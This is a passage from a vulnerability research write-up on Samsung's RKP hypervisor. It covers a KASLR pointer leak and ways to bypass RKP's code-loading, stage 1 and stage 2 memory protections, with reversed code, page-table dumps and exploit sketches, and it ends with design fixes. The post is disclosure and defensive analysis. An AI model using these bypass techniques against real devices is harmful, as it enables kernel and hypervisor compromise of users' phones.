The Linux kernel does include mechanisms intended to prevent the leakage of such pointers to user-space. One such mitigation is enforced by ensuring that every time a pointer’s value is written by the kernel, it is printed using a special format specifier: “%pK”. Then, depending on the value of kptr_restrict, the kernel may anonymise the printed pointer. In all Android devices that I’ve encountered, kptr_restrict is configured correctly, indeed ensuring the “%pK” pointers are anonymised.
Be that as it may, all we need is to find a single pointer which a kernel developer neglected to anonymise. In Samsung’s case, this turned out to be rather amusing… The pm_qos debugfs entry, which is readable by system_server, included the following code snippet responsible for outputting the entry’s contents:
static void pm_qos_debug_show_one(struct seq_file *s, struct pm_qos_object *qos)
{
   struct plist_node *p;
   unsigned long flags;

   spin_lock_irqsave(&pm_qos_lock, flags);

   seq_printf(s, "%s\n", qos->name);
   seq_printf(s, "   default value: %d\n", qos->constraints->default_value);
   seq_printf(s, "   target value: %d\n", qos->constraints->target_value);
   seq_printf(s, "   requests:\n");
   plist_for_each(p, &qos->constraints->list)
       seq_printf(s, "      %pk(%s:%d): %d\n",
                     container_of(p, struct pm_qos_request, node),
                     (container_of(p, struct pm_qos_request, node))->func,
                     (container_of(p, struct pm_qos_request, node))->line,
                     p->prio);

   spin_unlock_irqrestore(&pm_qos_lock, flags);
}
Unfortunately, the anonymisation format specifier is case sensitive… Using a lowercase “k”, like the code above, causes the pointer to be output without the anonymisation offered by “%pK” (perhaps this serves as a good example of how fragile KASLR is). Regardless, this allows us to simply read the contents of pm_qos and subtract the pointer’s known static address (derived from its fixed offset from the kernel’s base) from the leaked value, thus giving us the value of the KASLR slide.
Mitigation #2 - Loading Arbitrary Kernel Code
Preventing the allocation of new kernel code is one of the main mitigations enforced by RKP. In addition, RKP aims to protect all existing kernel code against modification. These mitigations are achieved by enforcing the following set of rules:
  1. All pages, with the exception of the kernel’s code, are marked as “Privileged Execute Never” (PXN)
  2. Kernel data pages are never marked executable
  3. Kernel code pages are never marked writable
  4. All kernel code pages are marked as read-only in the stage 2 translation table
  5. All memory translation entries (PGDs, PMDs and PTEs) are marked as read-only for EL1

While these rules appear to be quite robust, how can we be sure that they are being enforced correctly? Admittedly, the rules are laid out nicely in the RKP documentation, but that’s not a strong enough guarantee...
Instead of exercising trust, let’s start by challenging the first assertion; namely, that with the exception of the kernel’s code, all other pages are marked as PXN. We can check this assertion by looking at the stage 1 translation tables in EL1. ARMv8 supports the use of two translation tables in EL1, TTBR0_EL1 and TTBR1_EL1. TTBR0_EL1 is used to hold the mappings for user-space’s VAS, while TTBR1_EL1 holds the kernel’s global mappings.
In order to analyse the contents of the EL1 stage 1 translation table used by the kernel, we’ll need to first locate the physical address of the translation table itself. Once we find the translation table, we can use our execute_in_kernel primitive in order to iteratively execute a “read gadget” in the kernel, allowing us to read out the contents of the translation table.
There is one tiny snag, though - how will we be able to retrieve the location of the translation table? To do so, we’ll need to find a gadget which allows us to read TTBR1_EL1 without causing any adverse effects in the kernel.
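For illustration, the kind of gadget we’re after boils down to a single system register read followed by a return - something like the following sketch:
/* Sketch: an ideal side-effect-free "read gadget" for TTBR1_EL1. */
static inline unsigned long read_ttbr1_el1(void)
{
    unsigned long ttbr1;
    asm volatile("mrs %0, ttbr1_el1" : "=r"(ttbr1));
    return ttbr1;
}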
Unfortunately, combing over the kernel’s code reveals a depressing fact - it seems as though such gadgets are quite rare. While there are some functions that do read TTBR1_EL1, they also perform additional operations, resulting in unwanted side effects. In contrast, RKP’s code segments seem to be rife with such gadgets - in fact, RKP contains small gadgets to read and write nearly every single control register belonging to EL1.
Perhaps we could somehow use this fact to our advantage? Digging deeper into the kernel’s code (init/main.c) reveals that, rather perplexingly, on Exynos devices (as opposed to Qualcomm-based devices) RKP is bootstrapped by the EL1 kernel. This means that instead of EL2 being booted directly from EL3, EL1 is booted first and only then performs some operations in order to bootstrap EL2.
This bootstrapping is achieved by embedding the entire binary containing RKP’s code in the EL1 kernel’s code segment. Then, once the kernel boots, it copies the RKP binary to a predefined physical range and transitions to TrustZone in order to bootstrap and initialise RKP.

Since the RKP binary is embedded within the kernel’s text segment, it becomes part of the memory range which is executable from EL1. This allows us to leverage all of the gadgets in the embedded RKP binary - making life that much easier.
Equipped with this new knowledge, we can now create a small program which reads the location of the stage 1 translation table using the gadgets from the RKP binary directly in EL1, and subsequently dumps and parses the table’s contents. Since we are interested in bypassing the code loading mitigations enforced by RKP, we’ll focus on the physical memory ranges containing the Linux kernel. After writing and running this program, we are faced with the following output:
...
[256] L1 table [PXNTable: 0, APTable: 0]
 [  0] 0x080000000-0x080200000 [PXN: 0, UXN: 1, AP: 0]
 [  1] 0x080200000-0x080400000 [PXN: 0, UXN: 1, AP: 0]
 [  2] 0x080400000-0x080600000 [PXN: 0, UXN: 1, AP: 0]
 [  3] 0x080600000-0x080800000 [PXN: 0, UXN: 1, AP: 0]
 [  4] 0x080800000-0x080a00000 [PXN: 0, UXN: 1, AP: 0]
 [  5] 0x080a00000-0x080c00000 [PXN: 0, UXN: 1, AP: 0]
 [  6] 0x080c00000-0x080e00000 [PXN: 0, UXN: 1, AP: 0]
 [  7] 0x080e00000-0x081000000 [PXN: 0, UXN: 1, AP: 0]
 [  8] 0x081000000-0x081200000 [PXN: 0, UXN: 1, AP: 0]
 [  9] 0x081200000-0x081400000 [PXN: 0, UXN: 1, AP: 0]
 [ 10] 0x081400000-0x081600000 [PXN: 1, UXN: 1, AP: 0]
...
As we can see above, the entire physical memory range [0x80000000, 0x81400000] is mapped in the stage 1 translation table using block descriptors, each of which is responsible for translating a 2MB range of memory. We can also see that, as expected, this range is marked UXN and non-PXN - therefore EL1 is allowed to execute memory in these ranges, while EL0 is prohibited from doing so. However, much more surprisingly, the entire range is marked with access permission (AP) bit values of “00”. Let’s consult the ARM VMSA to see what these values indicate:
[ARM VMSA: for stage 1 descriptors, AP[2:1] = 00 denotes read/write access from EL1 and no access from EL0]
Aha - so in fact this means that these memory ranges are also readable and writable from EL1! Combining all this together, we reach the conclusion that the entire physical range of [0x80000000, 0x81400000] is mapped as RWX in the stage 1 translation table.
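For reference, here’s a minimal sketch of how a 4KB-granule level 2 block descriptor can be decoded into the fields shown above (bit positions taken from the ARMv8 VMSA; the surrounding table-walking and read-gadget plumbing is omitted):
#include <stdint.h>
#include <stdio.h>

/* Decode a stage 1 level 2 block descriptor (4KB granule, 2MB blocks). */
static void decode_l2_block(int idx, uint64_t desc)
{
    if ((desc & 0x3) != 0x1)                     /* 0b01 at level 2 = block */
        return;
    uint64_t pa = desc & 0x0000FFFFFFE00000ULL;  /* output address, bits [47:21] */
    int ap  = (int)((desc >> 6)  & 0x3);         /* AP[2:1], bits [7:6] */
    int pxn = (int)((desc >> 53) & 0x1);         /* Privileged Execute Never */
    int uxn = (int)((desc >> 54) & 0x1);         /* Unprivileged Execute Never */
    printf(" [%3d] 0x%09llx-0x%09llx [PXN: %d, UXN: %d, AP: %d]\n",
           idx, (unsigned long long)pa,
           (unsigned long long)(pa + 0x200000), pxn, uxn, ap);
}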
This still doesn’t mean we can modify the kernel’s code. Remember, RKP enforces the stage 2 memory translation as well. These memory ranges could well be restricted in the stage 2 translation in order to prevent attackers from gaining write access to them.
After some reversing, we find that RKP’s initial stage 2 translation table is in fact embedded in the RKP binary itself. This allows us to extract its contents and to analyse it in detail, similar to our previous work on the stage 1 translation table.

I’ve written a Python script which analyses a given binary blob according to the stage 2 translation table format specified in the ARM VMSA. Next, we can use this script to discover the memory protections enforced by RKP on the kernel’s physical address range:
...
0x80000000-0x80200000: S2AP=11, XN=0
0x80200000-0x80400000: S2AP=11, XN=0
0x80400000-0x80600000: S2AP=11, XN=0
0x80600000-0x80800000: S2AP=11, XN=0
0x80800000-0x80a00000: S2AP=11, XN=0
0x80a00000-0x80c00000: S2AP=11, XN=0
0x80c00000-0x80e00000: S2AP=11, XN=0
0x80e00000-0x81000000: S2AP=11, XN=0
0x81000000-0x81200000: S2AP=11, XN=0
0x81200000-0x81400000: S2AP=11, XN=0
0x81400000-0x81600000: S2AP=11, XN=0
...
First of all, we can see that the stage 2 translation table used by RKP maps every IPA to the same PA. As such, we can safely ignore the existence of IPAs for the remainder of this blog post and focus on PAs instead.
More importantly, however, we can see that our memory range of interest is not marked as XN, as is expected. After all, the kernel should be executable by EL1. But bafflingly, the entire range is marked with the stage 2 access permission (S2AP) bits set to “11”. Once again, let’s consult the ARM VMSA:
The VMSA reveals that S2AP “11” denotes read/write access. So this seems a little odd… Does this mean that the entire kernel’s code range is marked as RWX in both the stage 1 and the stage 2 translation tables? That doesn’t seem to add up. Indeed, trying to write to memory addresses containing EL1 kernel code results in a translation fault, so we’re definitely missing something here.
Ah, but wait! The stage 2 translation tables that we’ve analysed above are simply the initial translation tables which are used when RKP boots. Perhaps after the EL1 kernel finishes its initialisation it will somehow request RKP to modify these mappings in order to protect its own memory ranges.
Indeed, looking once again at the kernel’s initialisation routines, we can see that shortly after booting, the EL1 kernel calls into RKP:
static void rkp_init(void)
{
    rkp_init_t init;
    init.magic = RKP_INIT_MAGIC;
    init.vmalloc_start = VMALLOC_START;
    init.vmalloc_end = (u64)high_memory;
    init.init_mm_pgd = (u64)__pa(swapper_pg_dir);
    init.id_map_pgd = (u64)__pa(idmap_pg_dir);
    init.rkp_pgt_bitmap = (u64)__pa(rkp_pgt_bitmap);
    init.rkp_map_bitmap = (u64)__pa(rkp_map_bitmap);
    init.rkp_pgt_bitmap_size = RKP_PGT_BITMAP_LEN;
    init.zero_pg_addr = page_to_phys(empty_zero_page);
    init._text = (u64) _text;
    init._etext = (u64) _etext;
    if (!vmm_extra_mem) {
        printk(KERN_ERR"Disable RKP: Failed to allocate extra mem\n");
        return;
    }
    init.extra_memory_addr = __pa(vmm_extra_mem);
    init.extra_memory_size = 0x600000;
    init._srodata = (u64) __start_rodata;
    init._erodata = (u64) __end_rodata;
    init.large_memory = rkp_support_large_memory;

    rkp_call(RKP_INIT, (u64)&init, 0, 0, 0, 0);
    rkp_started = 1;
    return;
}
On the kernel’s side, we can see that this command provides RKP with many of the memory ranges belonging to the kernel. In order to figure out how this command is handled, let’s shift our focus back to RKP. Reverse engineering the command’s implementation within RKP, we arrive at the following approximate high-level logic:
void handle_rkp_init(...) {
   ...
   void* kern_text_phys_start = rkp_get_pa(text);
   void* kern_text_phys_end = rkp_get_pa(etext);
   rkp_debug_log("DEFERRED INIT START", 0, 0, 0);

   if (etext & 0x1FFFFF)
       rkp_debug_log("Kernel range is not aligned", 0, 0, 0);

   if (!rkp_s2_range_change_permission(kern_text_phys_start, kern_text_phys_end, 128, 1, 1))
       rkp_debug_log("Failed to make Kernel range RO", 0, 0, 0);

   ...
}
The rkp_s2_range_change_permission call above is used to modify the stage 2 access permissions for a given PA memory range. Calling the function with these arguments causes the given memory range to be marked as read-only in the stage 2 translation. This means that shortly after booting the EL1 kernel, RKP does indeed lock down write access to the kernel’s code ranges.
...And yet, something’s still missing here. Remember that RKP should not only prevent the kernel’s code from being modified, but it aims to also prevent attackers from creating new executable code in EL1. Well, while the kernel’s code is indeed being marked as read-only in the stage 2 translation table, does that necessarily prevent us from creating new executable code?
Recall that we’ve previously encountered KASLR, whereby the kernel’s base address (both in the kernel’s VAS and in physical memory) is shifted by a randomised “slide” value. Moreover, since the Linux kernel assumes that the virtual to physical offset for kernel addresses is constant, the same slide value is used for both virtual and physical addresses.
However, there’s a tiny snag here -- the address range we examined earlier on, the same one which is marked RWX in both the stage 1 and stage 2 translation tables, is much larger than the kernel’s text segment. This is, in part, to allow the kernel to be placed anywhere within that region once the KASLR slide is determined. However, as we’ve just seen, after the KASLR slide is chosen, RKP only protects the range spanning from “_text” to “_etext” - that is, only the region containing the kernel’s text after applying the KASLR slide.

This leaves us with two large regions: [0x80000000, “_text”], [“_etext”, 0x81400000], which are left marked as RWX in both the stage 1 and stage 2 translation tables! Thus, we can simply write new code to these regions and execute it freely within the context of EL1, therefore bypassing the code loading mitigation. I’ve included a small PoC which demonstrates this issue, here.
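In outline, that PoC does something like the following (a sketch only - kernel_write and execute_in_kernel stand in for the primitives constructed earlier in this post, and ETEXT_UNSLID is a placeholder):
/* Sketch: place a payload in the RWX gap past _etext and run it in EL1. */
#define ETEXT_UNSLID 0xFFFFFFC000E00000UL   /* placeholder unslid _etext */

extern unsigned long kaslr_slide;           /* recovered via the pm_qos leak */
extern void kernel_write(unsigned long va, const void *buf, unsigned long len);
extern unsigned long execute_in_kernel(unsigned long entry_point);

void run_new_el1_code(const void *payload, unsigned long len)
{
    /* Anywhere in ["_etext", 0x81400000) works; recall that the slide
     * applies equally to the kernel's virtual and physical addresses. */
    unsigned long target = ETEXT_UNSLID + kaslr_slide + 0x1000;
    kernel_write(target, payload, len);
    /* A real exploit would also need to clean/invalidate caches here. */
    execute_in_kernel(target);
}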
Mitigation #3 - Bypassing EL1 Memory Controls
As we’ve just seen in the previous section, some of RKP’s stated goals require memory controls that are enforced not only in the stage 2 translation, but also directly in the stage 1 translation used by EL1. For example, RKP aims to ensure that all pages, with the exception of the kernel’s code, are marked as PXN. These goals require RKP to have some form of control over the contents of the stage 1 translation table.
So how exactly does RKP make sure that these kinds of assurances are kept? This is done using a combined approach; first, the stage 1 translation tables are placed in a region which is marked as read-only in the stage 2 translation tables. This, in effect, prevents EL1 code from directly modifying the translation tables themselves. Secondly, the kernel is instrumented (a form of paravirtualisation) in order to make it aware of RKP’s existence. This instrumentation ensures that each write operation to a data structure used in the stage 1 translation process (a PGD, PMD or PTE) instead calls an RKP command, informing RKP of the requested change.
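Schematically, the instrumented write looks something like the following sketch (the actual command name and calling convention are approximations - the real ones come from Samsung’s kernel sources):
/* Sketch of the paravirtualised PTE write: rather than storing the value
 * directly, the kernel asks RKP to perform (and vet) the write.
 * RKP_CMD_WRITE_PTE is a placeholder for the real command identifier. */
static inline void rkp_set_pte(pte_t *ptep, pte_t pte)
{
    rkp_call(RKP_CMD_WRITE_PTE, (u64)ptep, pte_val(pte), 0, 0, 0);
}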
Putting these two defences together, we arrive at the conclusion that all modifications to the stage 1 translation table must therefore pass through RKP which can, in turn, ensure that they do not violate any of its security goals.
Or do they?
While these rules do prevent modification of the current contents of the stage 1 translation table, they don’t prevent an attacker from using the memory management control registers to circumvent these protections. For example, an attacker could attempt to modify the value of TTBR1_EL1 directly, pointing it at an arbitrary (and unprotected) memory address.
Obviously, such operations cannot be permitted by RKP. In order to allow the hypervisor to deal with such situations, the “Hypervisor Configuration Register” (HCR) can be leveraged. Recall that the HCR allows the hypervisor to disallow certain operations from being performed under EL1. One such operation which can be trapped is the modification of the EL1 memory management control registers.

In the case of RKP on Exynos devices, while it does not set HCR_EL2.TRVM (i.e., it allows all read access to memory control registers), it does indeed set HCR_EL2.TVM, allowing it to trap write access to these registers.
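For reference, enabling this trap from EL2 amounts to setting a single bit in HCR_EL2 (a sketch, with bit positions per the ARM reference manual):
/* Sketch (runs at EL2): trap EL1 writes to the virtual memory control
 * registers while leaving reads untrapped, mirroring RKP's configuration. */
static inline void trap_el1_vm_reg_writes(void)
{
    unsigned long hcr;
    asm volatile("mrs %0, hcr_el2" : "=r"(hcr));
    hcr |= (1UL << 26);   /* HCR_EL2.TVM: trap writes to SCTLR_EL1, TTBRn_EL1, TCR_EL1, ... */
                          /* HCR_EL2.TRVM (bit 30) stays clear: reads are allowed */
    asm volatile("msr hcr_el2, %0" :: "r"(hcr));
    asm volatile("isb");
}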
So although we’ve established that RKP does correctly trap write access to the control registers, this still doesn’t guarantee they remain protected. This is actually quite a delicate situation - the Linux kernel requires some access to many of these registers in order to perform regular operations. This means that while some access can be denied by RKP, other operations need to be inspected carefully in order to make sure they do not violate RKP’s safety guarantees, before allowing them to proceed. Once again, we’ll need to reverse engineer RKP’s code to assess the situation.
[Image: reverse-engineered RKP logic validating writes to the translation table base registers]
As we can see above, attempts to modify the location of the translation tables themselves result in RKP correctly verifying the entire new translation table, making sure it follows the allowed stage 1 translation policy. In contrast, there are a couple of crucial memory control registers which, at the time, weren’t intercepted by RKP at all - TCR_EL1 and SCTLR_EL1!
Inspecting these registers in the ARM reference manual reveals that they both can have profound effects on the stage 1 translation process.
For starters, the System Control Register for EL1 (SCTLR_EL1) provides top-level control over the system, including the memory system, in EL1. One bit of crucial importance in our scenario is the SCTLR_EL1.M bit.

This bit denotes the state of the MMU for stage 1 translation in EL0 and EL1. Therefore, simply by clearing this bit, an attacker can disable the MMU for stage 1 translation. Once the bit is cleared, all memory accesses in EL1 map directly to IPAs and, more importantly, no access permission checks are applied, effectively making all memory ranges RWX as far as the stage 1 translation is concerned. This, in turn, bypasses several of RKP’s assurances, such as ensuring that all pages other than the kernel’s text are marked as PXN.
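Concretely, the attack boils down to a single register write, executed in EL1 via the RKP gadgets mentioned earlier (a sketch):
/* Sketch: disable the EL1&0 stage 1 MMU by clearing SCTLR_EL1.M (bit 0). */
static inline void disable_stage1_mmu(void)
{
    unsigned long sctlr;
    asm volatile("mrs %0, sctlr_el1" : "=r"(sctlr));
    sctlr &= ~1UL;                       /* SCTLR_EL1.M = 0 */
    asm volatile("msr sctlr_el1, %0" :: "r"(sctlr));
    asm volatile("isb");
}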
As for the Translation Control Register for EL1 (TCR_EL1), its effects are slightly more subtle. Instead of completely disabling the stage 1 MMU, this register governs the way in which translation is performed.

Indeed, observing this register more closely reveals certain key ways in which an attacker may leverage it to circumvent RKP’s stage 1 protections. For example, AArch64 translation tables may assume different formats, depending on the translation granule under which the system is operating. Normally, AArch64 Linux kernels use a translation granule of 4KB.
This fact is implicitly acknowledged in RKP. For example, when code in EL1 changes the value of a translation table base register (e.g., TTBR1_EL1), RKP must protect the new PGD in the stage 2 translation in order to make sure that EL1 cannot gain access to it. Indeed, reversing the corresponding code within RKP reveals that it does just that:
[Image: RKP protecting the newly installed PGD as a single 4KB page in the stage 2 translation]
However, as we can see above, the stage 2 protection is only applied to a 4KB region (a single page). This is because, when using a 4KB translation granule, each translation table occupies exactly 4KB. However, this is where we, as attackers, come in. What if we were to change the translation granule to 64KB, by modifying TCR_EL1.TG0 and TCR_EL1.TG1?

In that case, each translation table in the new regime will be 64KB in size, as opposed to 4KB under the previous one. Since RKP uses a hard-coded size of 4KB when protecting the translation table, the bottom 60KB remain unprotected by RKP, allowing an attacker in EL1 to freely modify them in order to point translation entries at any IPA - and, more crucially, with any access permissions and UXN/PXN values.
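The register write itself is straightforward (a sketch of just the granule switch - a real attack must, of course, also prepare matching 64KB-granule translation tables beforehand):
/* Sketch: switch both translation granules to 64KB via TCR_EL1.
 * Note the different encodings: TG0 (bits [15:14]) uses 0b01 for 64KB,
 * while TG1 (bits [31:30]) uses 0b11 for 64KB. */
static inline void set_64kb_granules(void)
{
    unsigned long tcr;
    asm volatile("mrs %0, tcr_el1" : "=r"(tcr));
    tcr = (tcr & ~(3UL << 14)) | (1UL << 14);   /* TG0 = 0b01 */
    tcr = (tcr & ~(3UL << 30)) | (3UL << 30);   /* TG1 = 0b11 */
    asm volatile("msr tcr_el1, %0" :: "r"(tcr));
    asm volatile("isb");
}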

Lastly, it should once more be noted that while the gadgets needed to access these registers aren’t abundant in the kernel’s image, they are present in the embedded RKP binary on Exynos devices. Therefore we can simply execute these gadgets within EL1 in order to modify the registers above. I’ve written a small PoC that demonstrates this issue by disabling the stage 1 MMU in EL1.
Mitigation #4 - Accessing Stage 2 Unmapped Memory
Other than the operating system’s memory, there exist several other memory regions which may contain potentially sensitive information that should not be accessible by code running in EL0 and EL1. For example, peripherals on the SoC may have their firmware stored in the “Normal World”, in physical memory ranges which should never be accessible to Android itself.
In order to enforce such protections, RKP explicitly unmaps a few memory ranges from the stage 2 translation table. By doing so, any attempt to access these PA ranges in EL0 or EL1 will result in a translation fault, consequently crashing the kernel and rebooting the device.
Moreover, RKP’s own memory ranges should also be made inaccessible to lesser privileged code. This is crucial not only to protect RKP from modification by EL0 and EL1, but also to protect the sensitive information processed within RKP (such as the “cfprop” key). Indeed, after starting up, RKP explicitly unmaps its own memory ranges in order to prevent such access:
[Image: RKP code unmapping its own memory ranges from the stage 2 translation]
Admittedly, the stage 2 translation table itself is placed within the very region being unmapped from the stage 2 translation, thereby ensuring that code in EL1 cannot modify it. However, perhaps we could find another way to control stage 2 mappings, by leveraging RKP itself.
For example, as we’ve previously seen, certain operations such as setting TTBR1_EL1 result in changes to the stage 2 translation table. Combing over the RKP binary, we come across one such operation, as follows:
__int64 rkp_set_init_page_ro(struct rkp_args *args_buffer) /* argument type approximated from reversing */
{
 unsigned long page_pa = rkp_get_pa(args_buffer->arg0);
 if ( page_pa < rkp_get_pa(text) || page_pa >= rkp_get_pa(etext) )
 {
   if ( !rkp_s2_page_change_permission(page_pa, 128, 0, 0) )
     return rkp_debug_log("Cred: Unable to set permission for init cred", 0LL, 0LL, 0LL);
 }
 else
 {
   rkp_debug_log("Good init CRED is within RO range", 0LL, 0LL, 0LL);
 }
 rkp_debug_log("init cred page", 0LL, 0LL, 0LL);
 return rkp_set_pgt_bitmap(page_pa, 0);
}
As we can see, this command receives a pointer from EL1, verifies that it does not reside within the kernel’s text segment and, if it doesn’t, proceeds to call rkp_s2_page_change_permission in order to modify the access permissions on this range in the stage 2 translation table. Digging deeper into the function reveals that this set of parameters marks the region as read-only and XN.
But, what if we were to supply a page that resides somewhere that is not currently mapped in the stage 2 translation at all, such as RKP’s own memory ranges? Well, in this case, rkp_s2_page_change_permission will happily create a translation entry for the given page, effectively mapping in a previously unmapped region!
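From EL1, triggering this behaviour is then as simple as issuing the command with a suitably chosen address (a sketch - the command identifier and calling convention below are placeholders approximated from reversing):
/* Sketch: re-map a stage 2 unmapped page (e.g., within RKP's own range)
 * by abusing rkp_set_init_page_ro. The page comes back read-only and XN,
 * which is enough to read RKP's memory from EL1.
 * RKP_CMD_SET_INIT_PAGE_RO is a placeholder command id. */
#define RKP_CMD_SET_INIT_PAGE_RO 0x00

void remap_unmapped_page(u64 target_va)
{
    /* target_va must translate to a PA outside [_text, _etext] so that
     * rkp_s2_page_change_permission is reached. */
    rkp_call(RKP_CMD_SET_INIT_PAGE_RO, target_va, 0, 0, 0, 0);
}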
This allows us to re-map any stage 2 unmapped region (albeit as read-only and XN) from EL1. I’ve written a small PoC which demonstrates the issue by re-mapping RKP’s physical address range in the stage 2 translation and reading it from EL1.
Design Improvements to RKP
Having seen some specific issues highlighting how the different defence mechanisms of RKP can be subverted by an attacker, let’s zoom out for a second and consider some design choices that could strengthen RKP’s security posture against future attacks.
First, RKP on Exynos devices is currently bootstrapped by EL1 code. This is in contrast to the model used on Qualcomm devices, whereby the EL2 code is both verified by the bootloader and subsequently booted by EL3. Ideally, I believe the same model used on Qualcomm devices should be adopted for Exynos as well.
Performing the bootstrapping in this order automatically fixes other related security issues “for free”, such as the presence of RKP’s binary within the kernel’s text segment. As we’ve seen, this seemingly harmless detail turns out to be very useful to an attacker in several of the scenarios highlighted in this post. Moreover, it removes other risks, such as attackers exploiting the EL1 kernel early in the boot process and leveraging that access to subvert the initialisation of EL2.
As an interim improvement, Samsung has decided to zero out the RKP binary resident in the EL1 kernel’s code segment during initialisation. This improvement will roll out in the next Nougat milestone release for Samsung devices, and addresses the issue of attackers leveraging the embedded binary for gadgets. However, it doesn’t address the potential for early exploitation of the EL1 kernel to subvert the initialisation of EL2, which requires a more extensive modification.
Second, RKP’s code segments are currently marked as both writable and executable in TTBR0_EL2. This, combined with the fact that SCTLR_EL2.WXN is not set, allows an attacker to use any memory corruption primitive in EL2 in order to directly overwrite the EL2 code segments, allowing for much easier exploitation of the hypervisor.
While I have chosen not to include them in this blog post, I’ve found several memory corruptions in RKP, any of which could be used to modify memory within its context. Combining these two facts, we can conclude that any of these memory corruptions could be used by an attacker to directly modify RKP’s code itself, thereby gaining code execution within it.
Simply setting SCTLR_EL2.WXN and marking RKP’s code as read-only would not prevent an attacker from gaining access to RKP, but it could make such memory corruptions harder and more time consuming to exploit.
Third, RKP should lock down all memory control registers, unless they absolutely must be used by the Linux kernel. This would prevent abuse of several of these registers which may subtly affect the system’s behaviour, and in doing so, violate assumptions made by RKP about the kernel. Where these registers have to be modified by EL1, RKP should verify that only the appropriate bits are accessed.
RKP has since locked down access to the two registers mentioned in this blog post. This is a step in the right direction. Unfortunately, as access to some of these registers must be retained by the kernel, simply revoking access to all of them is not a feasible solution. As such, preventing access to the remaining memory control registers remains a long term goal.
Lastly, there should be some distinction between stage 2 unmapped regions that were simply never mapped in, and those which were explicitly mapped out. This can be achieved by storing the memory ranges corresponding to explicitly unmapped regions, and disallowing any modification that would result in remapping them within RKP. While the issue I highlighted is now fixed, implementing this extra step would prevent further similar issues from cropping up in the future.